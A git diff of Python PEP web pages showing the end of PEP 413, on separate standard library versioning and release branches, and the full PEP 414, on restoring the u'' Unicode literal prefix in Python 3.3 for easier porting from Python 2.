PEP 407 (full releases): same as status quo, but becomes a far more +frequent occurrence.

+

PEP 407 (language updates limited to LTS releases): unclear, as the PEP +doesn’t currently spell out a specific development strategy. Assuming a +3.3 compatibility branch is adopted (as proposed in this PEP), then the +outcome would be much the same, but the version number signalling would be +slightly less clear (since you would have to check to see if a particular +release was an LTS release or not).

+

Verdict: while not as clear cut as some previous scenarios, I’m still +calling this one in favour of the scheme in this PEP. Explicit is better than +implicit, and the scheme in this PEP makes a clear split between the two +different kinds of update rather than adding a separate “LTS” tag to an +otherwise ordinary release number. Tagging a particular version as being +special is great for communicating with version control systems and associated +automated tools, but it’s a lousy way to communicate information to other +humans.

+
+
+

Python developer, deciding their minimum version dependency

+

Status quo: look for “version added” or “version changed” markers in the +documentation, check against sys.version_info

+

This PEP: look for “version added” or “version changed” markers in the +documentation. If written as a bare Python version, such as “3.3”, check +against sys.version_info. If qualified with a standard library version, +such as “3.3 (33.1)”, check against sys.stdlib_info.
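A sketch of what such a check might have looked like (since this PEP was withdrawn, sys.stdlib_info was never implemented; the attribute and its fields are assumed from the example given earlier):

import sys

def stdlib_at_least(python, version):
    info = getattr(sys, 'stdlib_info', None)  # absent on real interpreters
    if info is None:
        return False
    return (info.python, info.version) >= (python, version)

# Depending on a feature documented as added in "3.3 (33.1)":
if stdlib_at_least(33, 1):
    print("standard library release 33.1 or later available")
else:
    print("fall back to the 3.3.0 behaviour")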

+

PEP 407: same as status quo

+

Verdict: the scheme in this PEP actually allows third party libraries to be +more explicit about their rate of adoption of standard library features. More +conservative projects will likely pin their dependency to the language +version and avoid features added in the standard library releases. Faster +moving projects could instead declare their dependency on a particular +standard library version. However, since PEP 407 does have the advantage of +preserving the status quo, I’m calling this one for PEP 407 (albeit with a +slim margin).

+
+
+

Python developers, attempting to reproduce a tracker issue

+

Status quo: if not already provided, ask the reporter which version of +Python they’re using. This is often done by asking for the first two lines +displayed by the interactive prompt or the value of sys.version.

+

This PEP: same as the status quo (as sys.version will be updated to +also include the standard library version), but may be needed on additional +occasions (where the user knew enough to state their Python version, but that +proved to be insufficient to reproduce the fault).

+

PEP 407: same as the status quo

+

Verdict: another marginal win for PEP 407. The new standard library version +is an extra piece of information that users may need to pass back to +developers when reporting issues with Python libraries (or Python itself, +on our own tracker). However, by including it in sys.version, many +fault reports will already include it, and it is easy to request if needed.

+
+
+

CPython release managers, handling a security fix

+

Status quo: create a new maintenance release incorporating the security +fix and any other bug fixes under source control. Also create source releases +for any branches open solely for security fixes.

+

This PEP: same as the status quo for maintenance branches. Also create a +new standard library release (potentially incorporating new features along +with the security fix). For security branches, create source releases for +both the former maintenance branch and the standard library update branch.

+

PEP 407: same as the status quo for maintenance and security branches, +but handling security fixes for non-LTS releases is currently an open +question.

+

Verdict: until PEP 407 is updated to actually address this scenario, a +clear win for this PEP.

+
+
+
+

Effects

+
+

Effect on development cycle

+

Similar to PEP 407, this PEP will break up the delivery of new features into +more discrete chunks. Instead of a whole raft of changes landing all at once +in a language release, each language release will be limited to 6 months +worth of standard library changes, as well as any changes associated with +new syntax.

+
+
+

Effect on workflow

+

This PEP proposes the creation of a single additional branch for use in the +normal workflow. After the release of 3.3, the following branches would be +in use:

+
2.7         # Maintenance branch, no change
+3.3         # Maintenance branch, as for 3.2
+3.3-compat  # New branch, backwards compatible changes
+default     # Language changes, standard library updates that depend on them
+
+
+

When working on a new feature, developers will need to decide whether or not +it is an acceptable change for a standard library release. If so, then it +should be checked in on 3.3-compat and then merged to default. +Otherwise it should be checked in directly to default.

+

The “version added” and “version changed” markers for any changes made on +the 3.3-compat branch would need to be flagged with both the language +version and the standard library version. For example: “3.3 (33.1)”.

+

Any changes made directly on the default branch would just be flagged +with “3.4” as usual.

+

The 3.3-compat branch would be closed to normal development at the +same time as the 3.3 maintenance branch. The 3.3-compat branch would +remain open for security fixes for the same period of time as the 3.3 +maintenance branch.

+
+
+

Effect on bugfix cycle

+

The effect on the bug fix workflow is essentially the same as that on the +workflow for new features - there is one additional branch to pass through +before the change reaches the default branch.

+

If critical bugs are found in a maintenance release, then new maintenance and +standard library releases will be created to resolve the problem. The final +part of the version number will be incremented for both the language version +and the standard library version.

+

If critical bugs are found in a standard library release that do not affect +the associated maintenance release, then only a new standard library release +will be created and only the standard library’s version number will be +incremented.

+

Note that in these circumstances, the standard library release may include +additional features, rather than just containing the bug fix. It is +assumed that anyone that cares about receiving only bug fixes without any +new features mixed in will already be relying strictly on the maintenance +releases rather than using the new standard library releases.

+
+
+

Effect on the community

+

PEP 407 has this to say about the effects on the community:

+
+
People who value stability can just synchronize on the LTS releases which, +with the proposed figures, would give a similar support cycle (both in +duration and in stability).
+

I believe this statement is just plain wrong. Life isn’t that simple. Instead, +developers of third party modules and frameworks will come under pressure to +support the full pace of the new release cycle with binary updates, teachers +and book authors will receive complaints that they’re only covering an “old” +version of Python (“You’re only using 3.3, the latest is 3.5!”), etc.

+

As the minor version number starts climbing 3 times faster than it has in the +past, I believe perceptions of language stability would also fall (whether +such opinions were justified or not).

+

I believe isolating the increased pace of change to the standard library, +and clearly delineating it with a separate version number will greatly +reassure the rest of the community that no, we’re not suddenly +asking them to triple their own rate of development. Instead, we’re merely +going to ship standard library updates for the next language release in +6-monthly installments rather than delaying them all until the next language +definition update, even those changes that are backwards compatible with the +previously released version of Python.

+

The community benefits listed in PEP 407 are equally applicable to this PEP, +at least as far as the standard library is concerned:

+
+
People who value reactivity and access to new features (without taking the +risk to install alpha versions or Mercurial snapshots) would get much more +value from the new release cycle than currently.

People who want to contribute new features or improvements would be more +motivated to do so, knowing that their contributions will be more quickly +available to normal users.

+
+

If the faster release cycle encourages more people to focus on contributing +to the standard library rather than proposing changes to the language +definition, I don’t see that as a bad thing.

+
+
+
+

Handling News Updates

+
+

What’s New?

+

The “What’s New” documents would be split out into separate documents for +standard library releases and language releases. So, during the 3.3 release +cycle, we would see:

+
    +
  • What’s New in Python 3.3?
  • +
  • What’s New in the Python Standard Library 33.1?
  • +
  • What’s New in the Python Standard Library 33.2?
  • +
  • What’s New in the Python Standard Library 33.3?
  • +
+

And then finally, we would see the next language release:

+
    +
  • What’s New in Python 3.4?
  • +
+

For the benefit of users that ignore standard library releases, the 3.4 +What’s New would link back to the What’s New documents for each of the +standard library releases in the 3.3 series.

+
+
+

NEWS

+

Merge conflicts on the NEWS file are already a hassle. Since this PEP +proposes introduction of an additional branch into the normal workflow, +resolving this becomes even more critical. While Mercurial phases may +help to some degree, it would be good to eliminate the problem entirely.

+

One suggestion from Barry Warsaw is to adopt a non-conflicting +separate-files-per-change approach, similar to that used by Twisted [2].

+

Given that the current manually updated NEWS file will be used for the 3.3.0 +release, one possible layout for such an approach might look like:

+
Misc/
+  NEWS  # Now autogenerated from news_entries
+  news_entries/
+    3.3/
+      NEWS # Original 3.3 NEWS file
+      maint.1/ # Maintenance branch changes
+        core/
+          <news entries>
+        builtins/
+          <news entries>
+        extensions/
+          <news entries>
+        library/
+          <news entries>
+        documentation/
+          <news entries>
+        tests/
+          <news entries>
+      compat.1/ # Compatibility branch changes
+        builtins/
+          <news entries>
+        extensions/
+          <news entries>
+        library/
+          <news entries>
+        documentation/
+          <news entries>
+        tests/
+          <news entries>
+      # Add maint.2, compat.2 etc as releases are made
+    3.4/
+      core/
+        <news entries>
+      builtins/
+        <news entries>
+      extensions/
+        <news entries>
+      library/
+        <news entries>
+      documentation/
+        <news entries>
+      tests/
+        <news entries>
+      # Add maint.1, compat.1 etc as releases are made
+
+
+

Putting the version information in the directory hierarchy isn’t strictly +necessary (since the NEWS file generator could figure out from the version +history), but does make it easier for humans to keep the different versions +in order.
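A minimal sketch of the kind of generation step implied above (the paths follow the hypothetical layout shown; no actual tooling is specified by this PEP):

import os

def build_news(root='Misc/news_entries'):
    # Concatenate the per-change files, walking directories in sorted
    # order so that the generated NEWS output is reproducible.
    parts = []
    for dirpath, _, filenames in sorted(os.walk(root)):
        for name in sorted(filenames):
            with open(os.path.join(dirpath, name)) as entry:
                parts.append(entry.read().rstrip())
    return '\n\n'.join(parts) + '\n'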

+
+
+
+

Other benefits of reduced version coupling

+
+

Slowing down the language release cycle

+

The current release cycle is a compromise between the desire for stability +in the core language definition and C extension ABI, and the desire to get +new features (most notably standard library updates) into users’ hands more +quickly.

+

With the standard library release cycle decoupled (to some degree) from that +of the core language definition, it provides an opportunity to actually +slow down the rate of change in the language definition. The language +moratorium for Python 3.2 effectively slowed that cycle down to more than 3 +years (3.1: June 2009, 3.3: August 2012) without causing any major +problems or complaints.

+

The NEWS file management scheme described above is actually designed to +allow us the flexibility to slow down language releases at the same time +as standard library releases become more frequent.

+

As a simple example, if a full two years was allowed between 3.3 and 3.4, +the 3.3 release cycle would end up looking like:

+
3.2.4       # Maintenance release
+3.3.0       # Language release
+
+3.3.1       # Maintenance release
+3.3 (33.1)  # Standard library release
+
+3.3.2       # Maintenance release
+3.3 (33.2)  # Standard library release
+
+3.3.3       # Maintenance release
+3.3 (33.3)  # Standard library release
+
+3.3.4       # Maintenance release
+3.3 (33.4)  # Standard library release
+3.4.0       # Language release
+
+
+

The elegance of the proposed branch structure and NEWS entry layout is that +this decision wouldn’t really need to be made until shortly before the planned +3.4 release date. At that point, the decision could be made to postpone the +3.4 release and keep the 3.3 and 3.3-compat branches open after the +3.3.3 maintenance release and the 3.3 (33.3) standard library release, thus +adding another standard library release to the cycle. The choice between +another standard library release or a full language release would then be +available every 6 months after that.

+
+
+

Further increasing the pace of standard library development

+

As noted in the previous section, one benefit of the scheme proposed in this +PEP is that it largely decouples the language release cycle from the +standard library release cycle. The standard library could be updated every +3 months, or even once a month, without having any flow-on effects on the +language version numbering or the perceived stability of the core language.

+

While that pace of development isn’t practical as long as the binary +installer creation for Windows and Mac OS X involves several manual steps +(including manual testing) and for as long as we don’t have separate +“<branch>-release” trees that only receive versions that have been marked as +good by the stable buildbots, it’s still a useful criterion to keep in mind +when considering proposed new versioning schemes: what if we eventually want +to make standard library releases even faster than every 6 months?

+

If the practical issues were ever resolved, then the separate standard +library versioning scheme in this PEP could handle it. The tagged version +number approach proposed in PEP 407 could not (at least, not without a lot +of user confusion and uncertainty).

+
+
+
+

Other Questions

+
+

Why not use the major version number?

+

The simplest and most logical solution would actually be to map the +major.minor.micro version numbers to the language version, stdlib version +and maintenance release version respectively.

+

Instead of releasing Python 3.3.0, we would instead release Python 4.0.0 +and the release cycle would look like:

+
4.0.0  # Language release
+
+4.0.1  # Maintenance release
+4.1.0  # Standard library release
+
+4.0.2  # Maintenance release
+4.2.0  # Standard library release
+
+4.0.3  # Maintenance release
+4.3.0  # Standard library release
+5.0.0  # Language release
+
+
+

However, the ongoing pain of the Python 2 -> Python 3 transition (and +associated workarounds like the python3 and python2 symlinks to +refer directly to the desired release series) means that this simple option +isn’t viable for historical reasons.

+

One way that this simple approach could be made to work is to merge the +current major and minor version numbers directly into a 2-digit major +version number:

+
33.0.0  # Language release
+
+33.0.1  # Maintenance release
+33.1.0  # Standard library release
+
+33.0.2  # Maintenance release
+33.2.0  # Standard library release
+
+33.0.3  # Maintenance release
+33.3.0  # Standard library release
+34.0.0  # Language release
+
+
+
+
+

Why not use a four part version number?

+

Another simple versioning scheme would just add a “standard library” version +into the existing versioning scheme:

+
3.3.0.0  # Language release
+
+3.3.0.1  # Maintenance release
+3.3.1.0  # Standard library release
+
+3.3.0.2  # Maintenance release
+3.3.2.0  # Standard library release
+
+3.3.0.3  # Maintenance release
+3.3.3.0  # Standard library release
+3.4.0.0  # Language release
+
+
+

However, this scheme isn’t viable due to backwards compatibility constraints +on the sys.version_info structure.

+
+
+

Why not use a date-based versioning scheme?

+

Earlier versions of this PEP proposed a date-based versioning scheme for +the standard library. However, such a scheme made it very difficult to +handle out-of-cycle releases to fix security issues and other critical +bugs in standard library releases, as it required the following steps:

+
    +
  1. Change the release version number to the date of the current month.
  2. Update the What’s New, NEWS and documentation to refer to the new release +number.
  3. Make the new release.
+

With the sequential scheme now proposed, such releases should at most require +a little tidying up of the What’s New document before making the release.

+
+
+

Why isn’t PEP 384 enough?

+

PEP 384 introduced the notion of a “Stable ABI” for CPython, a limited +subset of the full C ABI that is guaranteed to remain stable. Extensions +built against the stable ABI should be able to support all subsequent +Python versions with the same binary.

+

This will help new projects to avoid coupling their C extension modules too +closely to a specific version of CPython. For existing modules, however, +migrating to the stable ABI can involve quite a lot of work (especially for +extension modules that define a lot of classes). With limited development +resources available, any time spent on such a change is time that could +otherwise have been spent working on features that offer more direct benefits +to end users.

+

There are also other benefits to separate versioning (as described above) +that are not directly related to the question of binary compatibility with +third party C extensions.

+
+
+

Why no binary compatible additions to the C ABI in standard library releases?

+

There’s a case to be made that additions to the CPython C ABI could +reasonably be permitted in standard library releases. This would give C +extension authors the same freedom as any other package or module author +to depend either on a particular language version or on a standard library +version.

+

The PEP currently associates the interpreter version with the language +version, and therefore limits major interpreter changes (including C ABI +additions) to the language releases.

+

An alternative, internally consistent, approach would be to link the +interpreter version with the standard library version, with only changes that +may affect backwards compatibility limited to language releases.

+

Under such a scheme, the following changes would be acceptable in standard +library releases:

+
    +
  • Standard library updates
      +
    • new features in pure Python modules
    • +
    • new features in C extension modules (subject to PEP 399 compatibility +requirements)
    • +
    • new features in language builtins
    • +
    +
  • +
  • Interpreter implementation updates
      +
    • binary compatible additions to the C ABI
    • +
    • changes to the compilation toolchain that do not affect the AST or alter +the bytecode magic number
    • +
    • changes to the core interpreter eval loop
    • +
    +
  • +
  • bug fixes from the corresponding maintenance release
  • +
+

And the following changes would be acceptable in language releases:

+
    +
  • new language syntax
  • +
  • any updates acceptable in a standard library release
  • +
  • new deprecation warnings
  • +
  • removal of previously deprecated features
  • +
  • changes to the AST
  • +
  • changes to the emitted bytecode that require altering the magic number
  • +
  • binary incompatible changes to the C ABI (although the PEP 384 stable ABI +must still be preserved)
  • +
+

While such an approach could probably be made to work, there does not appear +to be a compelling justification for it, and the approach currently described +in the PEP is simpler and easier to explain.

+
+
+

Why not separate out the standard library entirely?

+

A concept that is occasionally discussed is the idea of making the standard +library truly independent from the CPython reference implementation.

+

My personal opinion is that actually making such a change would involve a +lot of work for next to no pay-off. CPython without the standard library is +useless (the build chain won’t even run, let alone the test suite). You also +can’t create a standalone pure Python standard library either, because too +many “standard library modules” are actually tightly linked in to the +internal details of their respective interpreters (for example, the builtins, +weakref, gc, sys, inspect, ast).

+

Creating a separate CPython development branch that is kept compatible with +the previous language release, and making releases from that branch that are +identified with a separate standard library version number should provide +most of the benefits of a separate standard library repository with only a +fraction of the pain.

+
+
+
+

Acknowledgements

+

Thanks go to the PEP 407 authors for starting this discussion, as well as +to those authors and Larry Hastings for initial discussions of the proposal +made in this PEP.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0413.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ \ No newline at end of file diff --git a/pep-0414/index.html b/pep-0414/index.html new file mode 100644 index 00000000000..133a5171a53 --- /dev/null +++ b/pep-0414/index.html @@ -0,0 +1,525 @@ + PEP 414 – Explicit Unicode Literal for Python 3.3 | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 414 – Explicit Unicode Literal for Python 3.3

+
+
Author:
+
Armin Ronacher <armin.ronacher at active-4.com>, +Alyssa Coghlan <ncoghlan at gmail.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
15-Feb-2012
+
Python-Version:
+
3.3
+
Post-History:
+
28-Feb-2012, 04-Mar-2012
+
Resolution:
+
Python-Dev message
+
+
+
+
+
+

Abstract

+

This document proposes the reintegration of an explicit unicode literal +from Python 2.x to the Python 3.x language specification, in order to +reduce the volume of changes needed when porting Unicode-aware +Python 2 applications to Python 3.

+
+
+

BDFL Pronouncement

+

This PEP has been formally accepted for Python 3.3:

+
+
I’m accepting the PEP. It’s about as harmless as they come. Make it so.
+
+
+

Proposal

+

This PEP proposes that Python 3.3 restore support for Python 2’s Unicode +literal syntax, substantially increasing the number of lines of existing +Python 2 code in Unicode aware applications that will run without modification +on Python 3.

+

Specifically, the Python 3 definition for string literal prefixes will be +expanded to allow:

+
"u" | "U"
+
+
+

in addition to the currently supported:

+
"r" | "R"
+
+
+

The following will all denote ordinary Python 3 strings:

+
'text'
+"text"
+'''text'''
+"""text"""
+u'text'
+u"text"
+u'''text'''
+u"""text"""
+U'text'
+U"text"
+U'''text'''
+U"""text"""
+
+
+

No changes are proposed to Python 3’s actual Unicode handling, only to the +acceptable forms for string literals.
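On an interpreter implementing this PEP, the prefix is accepted and ignored, which is directly observable:

# The u prefix changes nothing about the resulting object.
assert u'text' == 'text'
assert type(u'text') is str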

+
+
+

Exclusion of “Raw” Unicode Literals

+

Python 2 supports a concept of “raw” Unicode literals that don’t meet the +conventional definition of a raw string: \uXXXX and \UXXXXXXXX escape +sequences are still processed by the compiler and converted to the +appropriate Unicode code points when creating the associated Unicode objects.

+

Python 3 has no corresponding concept - the compiler performs no +preprocessing of the contents of raw string literals. This matches the +behaviour of 8-bit raw string literals in Python 2.

+

Since such strings are rarely used and would be interpreted differently in +Python 3 if permitted, it was decided that leaving them out entirely was +a better choice. Code which uses them will thus still fail immediately on +Python 3 (with a SyntaxError), rather than potentially producing different +output.

+

To get equivalent behaviour that will run on both Python 2 and Python 3, +either an ordinary Unicode literal can be used (with appropriate additional +escaping within the string), or else string concatenation or string +formatting can be used to combine the raw portions of the string with those +that require the use of Unicode escape sequences.
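For instance, a portable replacement for a Python 2 “raw Unicode” literal such as ur'\u00a7 \d+' might keep the escape in an ordinary literal and the raw part in a raw literal (illustrative only):

# Runs unchanged on Python 2 and on Python 3.3+ with this PEP.
pattern = u'\u00a7 ' + r'\d+'
assert pattern == u'\xa7 \\d+'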

+

Note that when using from __future__ import unicode_literals in Python 2, +the nominally “raw” Unicode string literals will process \uXXXX and +\UXXXXXXXX escape sequences, just like Python 2 strings explicitly marked +with the “raw Unicode” prefix.

+
+
+

Author’s Note

+

This PEP was originally written by Armin Ronacher, and Guido’s approval was +given based on that version.

+

The currently published version has been rewritten by Alyssa Coghlan to +include additional historical details and rationale that were taken into +account when Guido made his decision, but were not explicitly documented in +Armin’s version of the PEP.

+

Readers should be aware that many of the arguments in this PEP are not +technical ones. Instead, they relate heavily to the social and personal +aspects of software development.

+
+
+

Rationale

+

With the release of a Python 3 compatible version of the Web Server Gateway +Interface (WSGI) specification (PEP 3333) for Python 3.2, many parts of the +Python web ecosystem have been making a concerted effort to support Python 3 +without adversely affecting their existing developer and user communities.

+

One major item of feedback from key developers in those communities, including +Chris McDonough (WebOb, Pyramid), Armin Ronacher (Flask, Werkzeug), Jacob +Kaplan-Moss (Django) and Kenneth Reitz (requests) is that the requirement +to change the spelling of every Unicode literal in an application +(regardless of how that is accomplished) is a key stumbling block for porting +efforts.

+

In particular, unlike many of the other Python 3 changes, it isn’t one that +framework and library authors can easily handle on behalf of their users. Most +of those users couldn’t care less about the “purity” of the Python language +specification, they just want their websites and applications to work as well +as possible.

+

While it is the Python web community that has been most vocal in highlighting +this concern, it is expected that other highly Unicode aware domains (such as +GUI development) may run into similar issues as they (and their communities) +start making concerted efforts to support Python 3.

+
+
+

Common Objections

+
+

Complaint: This PEP may harm adoption of Python 3.2

+

This complaint is interesting, as it carries within it a tacit admission that +this PEP will make it easier to port Unicode aware Python 2 applications to +Python 3.

+

There are many existing Python communities that are prepared to put up with +the constraints imposed by the existing suite of porting tools, or to update +their Python 2 code bases sufficiently that the problems are minimised.

+

This PEP is not for those communities. Instead, it is designed specifically to +help people that don’t want to put up with those difficulties.

+

However, since the proposal is for a comparatively small tweak to the language +syntax with no semantic changes, it is feasible to support it as a third +party import hook. While such an import hook imposes some import time +overhead, and requires additional steps from each application that needs it +to get the hook in place, it allows applications that target Python 3.2 +to use libraries and frameworks that would otherwise only run on Python 3.3+ +due to their use of unicode literal prefixes.

+

One such import hook project is Vinay Sajip’s uprefix [4].

+

For those that prefer to translate their code in advance rather than +converting on the fly at import time, Armin Ronacher is working on a hook +that runs at install time rather than during import [5].

+

Combining the two approaches is of course also possible. For example, the +import hook could be used for rapid edit-test cycles during local +development, but the install hook for continuous integration tasks and +deployment on Python 3.2.
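As a rough illustration of the translation step such hooks perform, the following minimal sketch strips the prefix using the Python 3.3+ tokenizer (the real hooks, including uprefix, handle many more cases):

import io
import tokenize

def strip_u_prefixes(source):
    # Drop a leading u/U from string literals; all other tokens pass
    # through. untokenize in compatibility mode may adjust whitespace.
    result = []
    for tok in tokenize.generate_tokens(io.StringIO(source).readline):
        tok_type, tok_string = tok[0], tok[1]
        if tok_type == tokenize.STRING and tok_string[:1] in ('u', 'U'):
            tok_string = tok_string[1:]
        result.append((tok_type, tok_string))
    return tokenize.untokenize(result)

print(strip_u_prefixes("x = u'text'\n"))   # x = 'text' (modulo spacing)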

+

The approaches described in this section may prove useful, for example, for +applications that wish to target Python 3 on the Ubuntu 12.04 LTS release, +which will ship with Python 2.7 and 3.2 as officially supported Python +versions.

+
+
+

Complaint: Python 3 shouldn’t be made worse just to support porting from Python 2

+

This is indeed one of the key design principles of Python 3. However, one of +the key design principles of Python as a whole is that “practicality beats +purity”. If we’re going to impose a significant burden on third party +developers, we should have a solid rationale for doing so.

+

In most cases, the rationale for backwards incompatible Python 3 changes is +either to improve code correctness (for example, stricter default separation +of binary and text data and integer division upgrading to floats when +necessary), reduce typical memory usage (for example, increased usage of +iterators and views over concrete lists), or to remove distracting nuisances +that make Python code harder to read without increasing its expressiveness +(for example, the comma based syntax for naming caught exceptions). Changes +backed by such reasoning are not going to be reverted, regardless of +objections from Python 2 developers attempting to make the transition to +Python 3.

+

In many cases, Python 2 offered two ways of doing things for historical reasons. +For example, inequality could be tested with both != and <> and integer +literals could be specified with an optional L suffix. Such redundancies +have been eliminated in Python 3, which reduces the overall size of the +language and improves consistency across developers.

+

In the original Python 3 design (up to and including Python 3.2), the explicit +prefix syntax for unicode literals was deemed to fall into this category, as it +is completely unnecessary in Python 3. However, the difference between those +other cases and unicode literals is that the unicode literal prefix is not +redundant in Python 2 code: it is a programmatically significant distinction +that needs to be preserved in some fashion to avoid losing information.

+

While porting tools were created to help with the transition (see next section) +it still creates an additional burden on heavy users of unicode strings in +Python 2, solely so that future developers learning Python 3 don’t need to be +told “For historical reasons, string literals may have an optional u or +U prefix. Never use this yourselves, it’s just there to help with porting +from an earlier version of the language.”

+

Plenty of students learning Python 2 received similar warnings regarding string +exceptions without being confused or irreparably stunted in their growth as +Python developers. It will be the same with this feature.

+

This point is further reinforced by the fact that Python 3 still allows the +uppercase variants of the B and R prefixes for bytes literals and raw +bytes and string literals. If the potential for confusion due to string prefix +variants is that significant, where was the outcry asking that these +redundant prefixes be removed along with all the other redundancies that were +eliminated in Python 3?

+

Just as support for string exceptions was eliminated from Python 2 using the +normal deprecation process, support for redundant string prefix characters +(specifically, B, R, u, U) may eventually be eliminated +from Python 3, regardless of the current acceptance of this PEP. However, +such a change will likely only occur once third party libraries supporting +Python 2.7 are about as common as libraries supporting Python 2.2 or 2.3 are +today.

+
+
+

Complaint: The WSGI “native strings” concept is an ugly hack

+

One reason the removal of unicode literals has provoked such concern amongst +the web development community is that the updated WSGI specification had to +make a few compromises to minimise the disruption for existing web servers +that provide a WSGI-compatible interface (this was deemed necessary in order +to make the updated standard a viable target for web application authors and +web framework developers).

+

One of those compromises is the concept of a “native string”. WSGI defines +three different kinds of string:

+
    +
  • text strings: handled as unicode in Python 2 and str in Python 3
  • +
  • native strings: handled as str in both Python 2 and Python 3
  • +
  • binary data: handled as str in Python 2 and bytes in Python 3
  • +
+

Some developers consider WSGI’s “native strings” to be an ugly hack, as they +are explicitly documented as being used solely for latin-1 decoded +“text”, regardless of the actual encoding of the underlying data. Using this +approach bypasses many of the updates to Python 3’s data model that are +designed to encourage correct handling of text encodings. However, it +generally works due to the specific details of the problem domain - web server +and web framework developers are some of the individuals most aware of how +blurry the line can get between binary data and text when working with HTTP +and related protocols, and how important it is to understand the implications +of the encodings in use when manipulating encoded text data. At the +application level most of these details are hidden from the developer by +the web frameworks and support libraries (both in Python 2 and in Python 3).

+

In practice, native strings are a useful concept because there are some APIs +(both in the standard library and in third party frameworks and packages) and +some internal interpreter details that are designed primarily to work with +str. These components often don’t support unicode in Python 2 +or bytes in Python 3, or, if they do, require additional encoding details +and/or impose constraints that don’t apply to the str variants.

+

Some example of interfaces that are best handled by using actual str +instances are:

+
    +
  • Python identifiers (as attributes, dict keys, class names, module names, +import references, etc)
  • +
  • URLs for the most part as well as HTTP headers in urllib/http servers
  • +
  • WSGI environment keys and CGI-inherited values
  • +
  • Python source code for dynamic compilation and AST hacks
  • +
  • Exception messages
  • +
  • __repr__ return value
  • +
  • preferred filesystem paths
  • +
  • preferred OS environment
  • +
+

In Python 2.6 and 2.7, these distinctions are most naturally expressed as +follows:

+
    +
  • u"": text string (unicode)
  • +
  • "": native string (str)
  • +
  • b"": binary data (str, also aliased as bytes)
  • +
+

In Python 3, the latin-1 decoded native strings are not distinguished +from any other text strings:

+
    +
  • "": text string (str)
  • +
  • "": native string (str)
  • +
  • b"": binary data (bytes)
  • +
+

If from __future__ import unicode_literals is used to modify the behaviour +of Python 2, then, along with an appropriate definition of n(), the +distinction can be expressed as:

+
    +
  • "": text string
  • +
  • n(""): native string
  • +
  • b"": binary data
  • +
+

(While n=str works for simple cases, it can sometimes have problems +due to non-ASCII source encodings)
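For illustration, an n() helper along the lines described above might be +defined as follows (a sketch only: the PEP does not specify n(), and the +explicit latin-1 encoding mirrors WSGI’s definition of native strings):

import sys
+
+if sys.version_info[0] >= 3:
+    def n(literal):
+        # Python 3: native strings are simply str
+        return literal
+else:
+    def n(literal):
+        # Python 2 with unicode_literals: encode the (now unicode) literal
+        # back to a native str; encoding explicitly rather than using n=str
+        # avoids surprises with non-ASCII source encodings
+        return literal.encode("latin-1")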

+

In the common subset of Python 2 and Python 3 (with appropriate +specification of a source encoding and definitions of the u() and b() +helper functions), they can be expressed as:

+
    +
  • u(""): text string
  • +
  • "": native string
  • +
  • b(""): binary data
  • +
+

That last approach is the only variant that supports Python 2.5 and earlier.
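Minimal u() and b() helpers for that common subset might look like the +following sketch (assuming a UTF-8 source encoding; real projects generally +used the u() and b() functions from the six library instead):

import sys
+
+if sys.version_info[0] >= 3:
+    def u(text):
+        return text                      # already a text string
+    def b(data):
+        return data.encode("latin-1")    # recover the bytes of the literal
+else:
+    def u(text):
+        return text.decode("utf-8")      # decode using the source encoding
+    def b(data):
+        return data                      # str literals are already binary data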

+

Of all the alternatives, the format currently supported in Python 2.6 and 2.7 +is by far the cleanest approach that clearly distinguishes the three desired +kinds of behaviour. With this PEP, that format will also be supported in +Python 3.3+. It will also be supported in Python 3.1 and 3.2 through the use +of import and install hooks. While it is significantly less likely, it is +also conceivable that the hooks could be adapted to allow the use of the +b prefix on Python 2.5.

+
+
+

Complaint: The existing tools should be good enough for everyone

+

A commonly expressed sentiment from developers that have already successfully +ported applications to Python 3 is along the lines of “if you think it’s hard, +you’re doing it wrong” or “it’s not that hard, just try it!”. While it is no +doubt unintentional, these responses all have the effect of telling the +people that are pointing out inadequacies in the current porting toolset +“there’s nothing wrong with the porting tools, you just suck and don’t know +how to use them properly”.

+

These responses are a case of completely missing the point of what people are +complaining about. The feedback that resulted in this PEP isn’t due to people +complaining that ports aren’t possible. Instead, the feedback is coming from +people that have successfully completed ports and are objecting that they +found the experience thoroughly unpleasant for the class of application that +they needed to port (specifically, Unicode aware web frameworks and support +libraries).

+

This is a subjective appraisal, and it’s the reason why the Python 3 +porting tools ecosystem is a case where the “one obvious way to do it” +philosophy emphatically does not apply. While it was originally intended that +“develop in Python 2, convert with 2to3, test both” would be the standard +way to develop for both versions in parallel, in practice, the needs of +different projects and developer communities have proven to be sufficiently +diverse that a variety of approaches have been devised, allowing each group +to select an approach that best fits their needs.

+

Lennart Regebro has produced an excellent overview of the available migration +strategies [2], and a similar review is provided in the official porting +guide [3]. (Note that the official guidance has softened to “it depends on +your specific situation” since Lennart wrote his overview).

+

However, both of those guides are written from the founding assumption that +all of the developers involved are already committed to the idea of +supporting Python 3. They make no allowance for the social aspects of such a +change when you’re interacting with a user base that may not be especially +tolerant of disruptions without a clear benefit, or are trying to persuade +Python 2 focused upstream developers to accept patches that are solely about +improving Python 3 forward compatibility.

+

With the current porting toolset, every migration strategy will result in +changes to every Unicode literal in a project. No exceptions. They will +be converted to either an unprefixed string literal (if the project decides to +adopt the unicode_literals import) or else to a converter call like +u("text").

+

If the unicode_literals import approach is employed, but is not adopted +across the entire project at the same time, then the meaning of a bare string +literal may become annoyingly ambiguous. This problem can be particularly +pernicious for aggregated software, like a Django site - in such a situation, +some files may end up using the unicode_literals import and others may not, +creating definite potential for confusion.

+

While these problems are clearly solvable at a technical level, they’re a +completely unnecessary distraction at the social level. Developer energy should +be reserved for addressing real technical difficulties associated with the +Python 3 transition (like distinguishing their 8-bit text strings from their +binary data). They shouldn’t be punished with additional code changes (even +automated ones) solely due to the fact that they have already explicitly +identified their Unicode strings in Python 2.

+

Armin Ronacher has created an experimental extension to 2to3 which only +modernizes Python code to the extent that it runs on Python 2.7 or later with +support from the cross-version compatibility six library. This tool is +available as python-modernize [1]. Currently, the deltas generated by +this tool will affect every Unicode literal in the converted source. This +will create legitimate concerns amongst upstream developers asked to accept +such changes, and amongst framework users being asked to change their +applications.

+

However, by eliminating the noise from changes to the Unicode literal syntax, +many projects could be cleanly and (comparatively) non-controversially made +forward compatible with Python 3.3+ just by running python-modernize and +applying the recommended changes.

+
+
+
+

References

[1] python-modernize: +https://github.com/mitsuhiko/python-modernize
[2] Lennart Regebro, “Porting to Python 3: Migration strategies”: +http://python3porting.com/strategies.html
